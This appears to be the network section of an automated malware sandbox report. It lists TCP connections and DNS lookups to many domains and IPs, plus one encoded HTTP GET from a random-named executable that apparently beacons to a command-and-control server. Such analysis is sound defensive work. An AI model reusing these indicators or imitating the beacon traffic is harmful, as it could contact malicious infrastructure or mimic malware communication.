                                                                                  Jan 15, 2025 08:29:22.661767006 CET4990780192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:22.666555882 CET804990785.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:24.178133965 CET4990780192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:24.189352036 CET804990785.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:24.189416885 CET4990780192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:25.197326899 CET4990880192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:25.202347994 CET804990885.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:25.202586889 CET4990880192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:25.204530001 CET4990880192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:25.209389925 CET804990885.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:26.709393024 CET4990880192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:26.714637041 CET804990885.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:26.714802027 CET4990880192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:27.728406906 CET4990980192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:27.733357906 CET804990985.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:27.733428955 CET4990980192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:27.735284090 CET4990980192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:27.740075111 CET804990985.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:27.740215063 CET804990985.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:29.240809917 CET4990980192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:29.246357918 CET804990985.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:29.246500969 CET4990980192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:30.258713961 CET4991080192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:30.264136076 CET804991085.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:30.264224052 CET4991080192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:30.265819073 CET4991080192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:30.270795107 CET804991085.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:30:30.970251083 CET804991085.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:30:30.970396996 CET804991085.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:30:30.972757101 CET4991080192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:30:30.972757101 CET4991080192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:30:30.977719069 CET804991085.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:30:36.016901970 CET4991380192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:36.021845102 CET804991391.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:36.021974087 CET4991380192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:36.024121046 CET4991380192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:36.028923035 CET804991391.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:36.677772045 CET804991391.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:36.677836895 CET804991391.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:36.677922964 CET4991380192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:37.537651062 CET4991380192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:38.556013107 CET4991480192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:38.710681915 CET804991491.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:38.710841894 CET4991480192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:38.716013908 CET4991480192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:38.720865965 CET804991491.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:39.366835117 CET804991491.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:39.366906881 CET804991491.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:39.368093967 CET4991480192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:40.225296021 CET4991480192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:41.244354963 CET4991580192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:41.249547958 CET804991591.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:41.250016928 CET4991580192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:41.252074003 CET4991580192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:41.257004976 CET804991591.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:41.257091045 CET804991591.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:41.895771980 CET804991591.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:41.895793915 CET804991591.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:41.895849943 CET4991580192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:42.756557941 CET4991580192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:43.774983883 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:43.779880047 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:43.779978991 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:43.781824112 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:43.786567926 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635128021 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635144949 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635154963 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635164976 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635175943 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635185957 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635198116 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635207891 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635217905 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635230064 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.635382891 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:44.635384083 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:44.640238047 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.640249014 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.640258074 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.644046068 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:44.732253075 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.732266903 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.732287884 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.732300043 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.732312918 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.732326031 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.732567072 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:44.732567072 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:44.732906103 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.732939959 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.732953072 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.732959986 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.733166933 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:44.733460903 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:44.733917952 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:44.737303019 CET4991680192.168.2.691.195.240.94
                                                                                  Jan 15, 2025 08:30:44.742082119 CET804991691.195.240.94192.168.2.6
                                                                                  Jan 15, 2025 08:30:57.952817917 CET4991780192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:30:57.957606077 CET804991766.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:30:57.957673073 CET4991780192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:30:57.960477114 CET4991780192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:30:57.965332985 CET804991766.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:30:58.598176003 CET804991766.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:30:58.598236084 CET804991766.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:30:58.600423098 CET4991780192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:30:59.479397058 CET4991780192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:00.493943930 CET4991880192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:00.498857975 CET804991866.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:00.498939037 CET4991880192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:00.500895977 CET4991880192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:00.505681992 CET804991866.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:01.115585089 CET804991866.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:01.115670919 CET804991866.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:01.115822077 CET4991880192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:02.006597042 CET4991880192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:03.026319981 CET4991980192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:03.032794952 CET804991966.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:03.032955885 CET4991980192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:03.034581900 CET4991980192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:03.041048050 CET804991966.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:03.041363001 CET804991966.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:03.651276112 CET804991966.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:03.651417017 CET804991966.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:03.651463032 CET4991980192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:04.537687063 CET4991980192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:05.558418989 CET4992080192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:05.563376904 CET804992066.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:05.563460112 CET4992080192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:05.565576077 CET4992080192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:05.570401907 CET804992066.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:06.171173096 CET804992066.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:06.171230078 CET804992066.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:06.171459913 CET4992080192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:06.175192118 CET4992080192.168.2.666.29.149.46
                                                                                  Jan 15, 2025 08:31:06.180011988 CET804992066.29.149.46192.168.2.6
                                                                                  Jan 15, 2025 08:31:11.284550905 CET4992180192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:11.289472103 CET8049921195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:11.290632963 CET4992180192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:11.292511940 CET4992180192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:11.297338009 CET8049921195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:11.957542896 CET8049921195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:11.957881927 CET8049921195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:11.957943916 CET4992180192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:12.803611994 CET4992180192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:13.826026917 CET4992280192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:13.830993891 CET8049922195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:13.831067085 CET4992280192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:13.841084957 CET4992280192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:13.845892906 CET8049922195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:14.503432989 CET8049922195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:14.504017115 CET8049922195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:14.504066944 CET4992280192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:15.350665092 CET4992280192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:16.394490957 CET4992380192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:16.399449110 CET8049923195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:16.399519920 CET4992380192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:16.414741993 CET4992380192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:16.419619083 CET8049923195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:16.419675112 CET8049923195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:17.091588974 CET8049923195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:17.091911077 CET8049923195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:17.092097044 CET4992380192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:17.928457022 CET4992380192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:18.974247932 CET4992480192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:18.979240894 CET8049924195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:18.985902071 CET4992480192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:18.985902071 CET4992480192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:18.990741968 CET8049924195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:19.662909985 CET8049924195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:19.801583052 CET4992480192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:19.842540026 CET8049924195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:19.842576027 CET8049924195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:19.842655897 CET4992480192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:19.842673063 CET4992480192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:19.843616009 CET4992480192.168.2.6195.110.124.133
                                                                                  Jan 15, 2025 08:31:19.848478079 CET8049924195.110.124.133192.168.2.6
                                                                                  Jan 15, 2025 08:31:41.050448895 CET4992580192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:41.055310965 CET8049925217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:41.055406094 CET4992580192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:41.058429003 CET4992580192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:41.063308954 CET8049925217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:41.615114927 CET8049925217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:41.615528107 CET8049925217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:41.615799904 CET4992580192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:42.569124937 CET4992580192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:43.590223074 CET4992680192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:43.595079899 CET8049926217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:43.598623991 CET4992680192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:43.602781057 CET4992680192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:43.607633114 CET8049926217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:44.177155972 CET8049926217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:44.177568913 CET8049926217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:44.177741051 CET4992680192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:45.118505001 CET4992680192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:46.135725021 CET4992880192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:46.140618086 CET8049928217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:46.140774965 CET4992880192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:46.142512083 CET4992880192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:46.147281885 CET8049928217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:46.147496939 CET8049928217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:46.699182034 CET8049928217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:46.699409008 CET8049928217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:46.702588081 CET4992880192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:47.647171021 CET4992880192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:48.684612989 CET4992980192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:48.689435959 CET8049929217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:48.689717054 CET4992980192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:48.692162991 CET4992980192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:48.696921110 CET8049929217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:49.267287970 CET8049929217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:49.267415047 CET8049929217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:49.267637968 CET4992980192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:49.267911911 CET8049929217.196.55.202192.168.2.6
                                                                                  Jan 15, 2025 08:31:49.268466949 CET4992980192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:49.270571947 CET4992980192.168.2.6217.196.55.202
                                                                                  Jan 15, 2025 08:31:49.275494099 CET8049929217.196.55.202192.168.2.6
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 15, 2025 08:28:30.033633947 CET4944553192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:28:31.022077084 CET4944553192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:28:31.321070910 CET53494451.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:28:31.321088076 CET53494451.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:28:47.274687052 CET5915853192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:28:47.284101009 CET53591581.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:28:55.337750912 CET6183153192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:28:55.761673927 CET53618311.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:29:14.290822983 CET5596653192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:29:14.447645903 CET53559661.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:29:22.556410074 CET5949653192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:29:22.652409077 CET53594961.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:30:35.980089903 CET5613053192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:30:36.014173985 CET53561301.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:30:49.744443893 CET6048353192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:30:49.754656076 CET53604831.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:30:57.807164907 CET5744853192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:30:57.949529886 CET53574481.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:31:11.181487083 CET4975453192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:31:11.281456947 CET53497541.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:31:24.854419947 CET5108053192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:31:24.866319895 CET53510801.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:31:32.931708097 CET6309853192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:31:32.941951990 CET53630981.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:31:41.001269102 CET5225153192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:31:41.048058033 CET53522511.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:31:54.276582956 CET5087053192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:31:54.285439014 CET53508701.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:32:02.354967117 CET5074353192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:32:02.364002943 CET53507431.1.1.1192.168.2.6
                                                                                  Jan 15, 2025 08:32:11.355354071 CET5239553192.168.2.61.1.1.1
                                                                                  Jan 15, 2025 08:32:11.373713970 CET53523951.1.1.1192.168.2.6
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Jan 15, 2025 08:28:30.033633947 CET192.168.2.61.1.1.10xb274Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:28:31.022077084 CET192.168.2.61.1.1.10xb274Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:28:47.274687052 CET192.168.2.61.1.1.10xe40bStandard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:28:55.337750912 CET192.168.2.61.1.1.10x387dStandard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:29:14.290822983 CET192.168.2.61.1.1.10xe28eStandard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:29:22.556410074 CET192.168.2.61.1.1.10xfc65Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:30:35.980089903 CET192.168.2.61.1.1.10xa3acStandard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:30:49.744443893 CET192.168.2.61.1.1.10x342eStandard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:30:57.807164907 CET192.168.2.61.1.1.10xdb57Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:11.181487083 CET192.168.2.61.1.1.10xbd7Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:24.854419947 CET192.168.2.61.1.1.10xab64Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:32.931708097 CET192.168.2.61.1.1.10x5bbaStandard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:41.001269102 CET192.168.2.61.1.1.10x3ca9Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:54.276582956 CET192.168.2.61.1.1.10x4c21Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:32:02.354967117 CET192.168.2.61.1.1.10xd140Standard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:32:11.355354071 CET192.168.2.61.1.1.10xfa9Standard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Jan 15, 2025 08:28:31.321070910 CET1.1.1.1192.168.2.60xb274No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:28:31.321088076 CET1.1.1.1192.168.2.60xb274No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:28:47.284101009 CET1.1.1.1192.168.2.60xe40bName error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:28:55.761673927 CET1.1.1.1192.168.2.60x387dNo error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:29:14.447645903 CET1.1.1.1192.168.2.60xe28eName error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:29:22.652409077 CET1.1.1.1192.168.2.60xfc65No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 15, 2025 08:29:22.652409077 CET1.1.1.1192.168.2.60xfc65No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 15, 2025 08:29:22.652409077 CET1.1.1.1192.168.2.60xfc65No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:30:36.014173985 CET1.1.1.1192.168.2.60xa3acNo error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:30:49.754656076 CET1.1.1.1192.168.2.60x342eName error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:30:57.949529886 CET1.1.1.1192.168.2.60xdb57No error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:11.281456947 CET1.1.1.1192.168.2.60xbd7No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:11.281456947 CET1.1.1.1192.168.2.60xbd7No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:24.866319895 CET1.1.1.1192.168.2.60xab64Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:32.941951990 CET1.1.1.1192.168.2.60x5bbaName error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:41.048058033 CET1.1.1.1192.168.2.60x3ca9No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:41.048058033 CET1.1.1.1192.168.2.60x3ca9No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:31:54.285439014 CET1.1.1.1192.168.2.60x4c21Name error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:32:02.364002943 CET1.1.1.1192.168.2.60xd140Name error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                  Jan 15, 2025 08:32:11.373713970 CET1.1.1.1192.168.2.60xfa9Name error (3)www.shenzhoucui.comnonenoneA (IP address)IN (0x0001)false
                                                                                  • www.3xfootball.com
                                                                                  • www.goldenjade-travel.com
                                                                                  • www.magmadokum.com
                                                                                  • www.rssnewscast.com
                                                                                  • www.techchains.info
                                                                                  • www.elettrosistemista.zip
                                                                                  • www.empowermedeco.com
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649864154.215.72.110803328C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 15, 2025 08:28:31.336708069 CET532OUTGET /fo8o/?pnGX8L3p=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.3xfootball.com
                                                                                  Connection: close
